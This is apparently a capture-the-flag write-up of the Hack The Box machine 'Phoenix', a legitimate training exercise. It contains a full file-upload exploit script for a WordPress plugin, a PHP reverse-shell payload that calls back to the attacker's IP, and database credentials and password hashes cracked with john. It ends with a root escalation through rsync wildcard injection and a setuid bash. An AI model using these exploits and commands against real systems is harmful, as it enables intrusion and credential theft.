IP -> 10.10.11.149
We start off with an nmap scan
$ nmap -sCV -v -p- 10.10.11.149
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9d:f3:87:cd:34:75:83:e0:3f:50:d8:39:c6:a5:32:9f (RSA)
| 256 ab:61:ce:eb:ed:e2:86:76:e9:e1:52:fa:a5:c7:7b:20 (ECDSA)
|_ 256 26:2e:38:ca:df:72:d4:54:fc:75:a4:91:65:cc:e8:b0 (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to https://phoenix.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
443/tcp open ssl/http Apache httpd
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| h2
|_ http/1.1
|_http-server-header: Apache
| ssl-cert: Subject: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Issuer: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-02-15T20:08:43
| Not valid after: 2032-02-13T20:08:43
| MD5: 320f c0ee 2f18 bd78 3abc e9d8 66a6 fc26
|_SHA-1: 6879 3f3b c7d3 a517 6785 bcc7 a726 51ce 8827 4a68
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: Did not follow redirect to https://phoenix.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Alright! We have port 22 running SSH, port 80 running HTTP, and port 443 running HTTPS.
When we access the website we get redirected to https://phoenix.htb. So let’s add it to our /etc/hosts file.
10.10.11.149 phoenix.htb
And let’s refresh the page!
On nmap we saw that this site is running wordpress, so let’s run wpscan!
$ wpscan --url https://phoenix.htb/ -e p --plugins-detection mixed --disable-tls-checks
...
[+] accordion-slider-gallery
| Location: https://phoenix.htb/wp-content/plugins/accordion-slider-gallery/
| Latest Version: 2.2
| Last Updated: 2022-05-07T11:22:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| The version could not be determined.
[+] akismet
| Location: https://phoenix.htb/wp-content/plugins/akismet/
| Latest Version: 4.2.4
| Last Updated: 2022-05-20T09:58:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - https://phoenix.htb/wp-content/plugins/akismet/, status: 500
|
| The version could not be determined.
[+] asgaros-forum
| Location: https://phoenix.htb/wp-content/plugins/asgaros-forum/
| Last Updated: 2022-01-30T12:54:00.000Z
| [!] The version is out of date, the latest version is 2.0.0
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| Version: 1.15.12 (10% confidence)
| Found By: Query Parameter (Passive Detection)
| - https://phoenix.htb/wp-content/plugins/asgaros-forum/skin/widgets.css?ver=1.15.12
[+] photo-gallery-builder
| Location: https://phoenix.htb/wp-content/plugins/photo-gallery-builder/
| Latest Version: 2.3
| Last Updated: 2022-05-07T11:20:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| The version could not be determined.
[+] pie-register
| Location: https://phoenix.htb/wp-content/plugins/pie-register/
| Latest Version: 3.7.5.1
| Last Updated: 2022-06-13T07:37:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| The version could not be determined.
[+] timeline-event-history
| Location: https://phoenix.htb/wp-content/plugins/timeline-event-history/
| Latest Version: 2.2
| Last Updated: 2022-05-07T11:26:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| The version could not be determined.
.....
There aren’t any interesting plugins that we can exploit.
After looking around I found that there was a plugin that wasn’t showing in our scan which is the “download from files” plugin version 1.4.8, which is vulnerable to file upload.
I will be using the following modified exploit from https://www.exploit-db.com/exploits/50287.
It was modified to accept self-signed HTTPS certificates.
import os.path
from os import path
import json
import requests;
import sys
def print_banner():
print("Download From Files <= 1.48 - Arbitrary File Upload")
print("Author -> spacehen (www.github.com/spacehen)")
def print_usage():
print("Usage: python3 exploit.py [target url] [php file]")
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")
def vuln_check(uri):
response = requests.get(uri, verify=False)
raw = response.text
if ("Sikeres" in raw):
return True;
else:
return False;
def main():
print_banner()
if(len(sys.argv) != 3):
print_usage();
sys.exit(1);
base = sys.argv[1]
file_path = sys.argv[2]
ajax_action = 'download_from_files_617_fileupload'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ;
check = vuln_check(uri);
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)
if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)
files = {'files[]' : open(file_path)}
data = {
"allowExt" : "php4,phtml",
"filesName" : "files",
"maxSize" : "1000",
"uploadDir" : "."
}
print("Uploading Shell...");
response = requests.post(uri, files=files, data=data, verify=False )
file_name = path.basename(file_path)
if("ok" in response.text):
print("Shell Uploaded!")
if(base[-1] != '/'):
base += '/'
print(base + "wp-admin/" + file_name);
else:
print("Shell Upload Failed")
sys.exit(1)
main();
Now we need the code to be uploaded. So I created a file shell.phtml with the following contents:
<?php system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.53/1234 0>&1'"); ?>
Okay let’s setup our netcat listener and run the script!
python3 50287.py https://phoenix.htb shell.phtml
Download From Files <= 1.48 - Arbitrary File Upload
Author -> spacehen (www.github.com/spacehen)
/usr/lib/python3.10/site-packages/urllib3/connectionpool.py:1043: InsecureRequestWarning: Unverified HTTPS request is being made to host 'phoenix.htb'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
warnings.warn(
Uploading Shell...
/usr/lib/python3.10/site-packages/urllib3/connectionpool.py:1043: InsecureRequestWarning: Unverified HTTPS request is being made to host 'phoenix.htb'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
warnings.warn(
Shell Uploaded!
https://phoenix.htb/wp-admin/shell.phtml
And in our netcat session:
$ nc -lvnp 1234
Connection from 10.10.11.149:33478
wp_user@phoenix:~/wordpress/wp-admin$ id
uid=1001(wp_user) gid=1001(wp_user) groups=1001(wp_user)
Now let’s run linpeas!
$ bash linpeas.sh
....SNIP..
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.149 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 fe80::250:56ff:feb9:e888 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:e888 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:e8:88 txqueuelen 1000 (Ethernet)
RX packets 149972 bytes 16300516 (16.3 MB)
RX errors 0 dropped 1041 overruns 0 frame 0
TX packets 120100 bytes 36534553 (36.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=195<UP,BROADCAST,RUNNING,NOARP> mtu 1500
inet 10.11.12.13 netmask 255.255.255.0 broadcast 0.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1976 bytes 204216 (204.2 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1976 bytes 204216 (204.2 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions
.........
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', '<++32%himself%FIRM%section%32++>' );
.........
╔══════════╣ Unexpected in root
/backups
.....
So we have two network adapters with different IP adresses, which we will investigate a bit later. We also have credentials for the wordpress database with the “wordpress” user and a /backups folder which we will inspect later.
Let’s get the usernames from the mysql databse.
$ mysql -u wordpress -p
password: <++32%himself%FIRM%section%32++>
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2864
Server version: 8.0.28-0ubuntu0.20.04.3 (Ubuntu)
Copyright (c) 2000, 2022, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use wordpress;
mysql> select user_login,user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| Phoenix | $P$BA5zlC0IhOiJKMTK.nWBgUB4Lxh/gc. |
| john | $P$B8eBH6QfVODeb/gYCSJRvm9MyRv7xz. |
| Jsmith | $P$BV5kUPHrZfVDDWSkvbt/Fw3Oeozb.G. |
| Jane | $P$BJCq26vxPmaQtAthFcnyNv1322qxD91 |
| Jack | $P$BzalVhBkVN.6ii8y/nbv3CTLbC0E9e. |
| user1 | $P$BfVdS7OmYoUg3794foF0AH5Lh6Df2v0 |
+------------+------------------------------------+
6 rows in set (0.00 sec)
Inspecting /etc/passwd we find that there are two users.
phoenix:x:1000:1000:Phoenix:/home/phoenix:/bin/bash
editor:x:1002:1002:John Smith,1,1,1,1:/home/editor:/bin/bash
Okay! So I am guessing that John Smith is Jsmith in wordpress.
Let’s crack the password!
$ john hashes --wordlist=rockyou.txt
Warning: detected hash type "phpass", but the string is also recognized as "PHPass-opencl"
Use the "--format=PHPass-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:04:23 12.06% (ETA: 15:16:16) 0g/s 7253p/s 7253c/s 7253C/s cocacola#1..cobalt20
0g 0:00:06:36 18.39% (ETA: 15:15:47) 0g/s 7207p/s 7207c/s 7207C/s vonzti..vontee9
superphoenix (Jsmith)
1g 0:00:08:04 DONE (2022-06-18 14:47) 0.002064g/s 7167p/s 7167c/s 7167C/s superphoenix..superorigina
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed
Great! We found credentials for the user editor!
Let’s try and ssh in:
$ ssh [email protected]
$$$$$$$\ $$\ $$\
$$ __$$\ $$ | \__|
$$ | $$ |$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$$\ $$\ $$\ $$\
$$$$$$$ |$$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ |\$$\ $$ |
$$ ____/ $$ | $$ |$$ / $$ |$$$$$$$$ |$$ | $$ |$$ | \$$$$ /
$$ | $$ | $$ |$$ | $$ |$$ ____|$$ | $$ |$$ | $$ $$<
$$ | $$ | $$ |\$$$$$$ |\$$$$$$$\ $$ | $$ |$$ |$$ /\$$\
\__| \__| \__| \______/ \_______|\__| \__|\__|\__/ \__|
([email protected]) Password: superphoenix
([email protected]) Verification code:
A verification code? Let’s skip over and inspect the other network adapter and open ports.
$ nc 10.11.12.13 22 -v
Connection to 10.11.12.13 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.4
Okay! Let’s try connecting to this IP!
$ ssh [email protected]
$$$$$$$\ $$\ $$\
$$ __$$\ $$ | \__|
$$ | $$ |$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$$\ $$\ $$\ $$\
$$$$$$$ |$$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ |\$$\ $$ |
$$ ____/ $$ | $$ |$$ / $$ |$$$$$$$$ |$$ | $$ |$$ | \$$$$ /
$$ | $$ | $$ |$$ | $$ |$$ ____|$$ | $$ |$$ | $$ $$<
$$ | $$ | $$ |\$$$$$$ |\$$$$$$$\ $$ | $$ |$$ |$$ /\$$\
\__| \__| \__| \______/ \_______|\__| \__|\__|\__/ \__|
Password: superphoenix
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-96-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 18 Jun 2022 02:48:02 PM UTC
System load: 0.0
Usage of /: 69.7% of 4.36GB
Memory usage: 27%
Swap usage: 0%
Processes: 269
Users logged in: 1
IPv4 address for ens160: 10.10.11.149
IPv6 address for ens160: dead:beef::250:56ff:feb9:e888
IPv4 address for eth0: 10.11.12.13
8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Jun 18 14:12:36 2022 from 10.11.12.13
editor@phoenix:~$ id
uid=1002(editor) gid=1002(editor) groups=1002(editor)
<!-- wp:code -->
<pre class="wp-block-code"><code>$ ssh [email protected]
$$$$$$$\ $$\ $$\
$$ __$$\ $$ | \__|
$$ | $$ |$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$$\ $$\ $$\ $$\
$$$$$$$ |$$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ |\$$\ $$ |
$$ ____/ $$ | $$ |$$ / $$ |$$$$$$$$ |$$ | $$ |$$ | \$$$$ /
$$ | $$ | $$ |$$ | $$ |$$ ____|$$ | $$ |$$ | $$ $$<
$$ | $$ | $$ |\$$$$$$ |\$$$$$$$\ $$ | $$ |$$ |$$ /\$$\
\__| \__| \__| \______/ \_______|\__| \__|\__|\__/ \__|
Password: superphoenix
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-96-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 18 Jun 2022 02:48:02 PM UTC
System load: 0.0
Usage of /: 69.7% of 4.36GB
Memory usage: 27%
Swap usage: 0%
Processes: 269
Users logged in: 1
IPv4 address for ens160: 10.10.11.149
IPv6 address for ens160: dead:beef::250:56ff:feb9:e888
IPv4 address for eth0: 10.11.12.13
8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Jun 18 14:12:36 2022 from 10.11.12.13
editor@phoenix:~$ id
uid=1002(editor) gid=1002(editor) groups=1002(editor)
editor@phoenix:~$ cat user.txt
968fa50dbd8b4d....
Great! We logged in!
After a bit of time enumerating I found an odd script in /usr/local/bin named “cron.sh.x”
Running strings didn’t get me anywhere so I got pspy64 running and ran the file.
$ ./pspy64s
...SNIP...
#!/bin/sh
NOW=$(date +"%Y-%m-%d-%H-%M")
FILE="phoenix.htb.$NOW.tar"
cd /backups
mysqldump -u root wordpress > dbbackup.sql
tar -cf $FILE dbbackup.sql && rm dbbackup.sql
gzip -9 $FILE
find . -type f -mmin +30 -delete
rsync --ignore-existing -t *.* [email protected]:/backups/
...
It directly gave us the contents of the script!
Analysing it we find that it’s running rsync with a wildward, which makes it vulnerable to wildcard injection.
Let’s go to backups and run the following to inject an argument and run our own script
$ cd /backups
$ touch -- "-e sh stuid.sh"
$ echo "chmod +s /bin/bash" > stuid.sh
After waiting a bit we find that the setUID bit is set for the /bin/bash program!
Let’s run it:
$ /bin/bash -p
bash-5.0# id
uid=1002(editor) gid=1002(editor) euid=0(root) egid=0(root) groups=0(root),1002(editor)
bash-5.0# cat /root/root.txt
c9fb2e679b706ee31....
I hope you enjoyed the writeup as much as I enjoyed doing this box!